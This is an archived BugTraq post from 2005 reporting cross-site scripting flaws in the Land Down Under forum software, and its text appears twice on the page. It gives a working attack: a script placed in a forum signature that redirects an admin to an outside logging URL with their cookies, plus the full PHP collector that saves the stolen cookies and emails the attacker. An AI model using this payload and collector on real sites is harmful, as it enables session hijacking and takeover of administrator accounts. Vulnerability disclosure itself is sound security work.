BugTraq
Back to list
|
Post reply
Land Down Under
Aug 28 2005 07:55AM
bendeniz_avci hotmail com
Bug finder:spyMASter
Web site:Realhackers.net
Contact:bendeniz_avci (at) hotmail (dot) com [email concealed]
LDU has some xss vulns
Firstly you can use html codes in your signature you can get cookies with this
put your signature that code
<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCRIPT>
and post a topic to forum when admin look this topic she/he redirect and you can get cookie
this is codes of ekle.php you can save cookie to a with this php code
<?php
$kayit = fopen("spymaster.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("bendeniz_avci (at) hotmail (dot) com [email concealed]","your cookie ready","http://www.realhackers.net/spyoku.txt",'From: spymaster (at) realhackers (dot) net [email concealed]');
?>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Web site:Realhackers.net
Contact:bendeniz_avci (at) hotmail (dot) com [email concealed]
LDU has some xss vulns
Firstly you can use html codes in your signature you can get cookies with this
put your signature that code
<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCRIPT>
and post a topic to forum when admin look this topic she/he redirect and you can get cookie
this is codes of ekle.php you can save cookie to a with this php code
<?php
$kayit = fopen("spymaster.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("bendeniz_avci (at) hotmail (dot) com [email concealed]","your cookie ready","http://www.realhackers.net/spyoku.txt",'From: spymaster (at) realhackers (dot) net [email concealed]');
?>
[ reply ]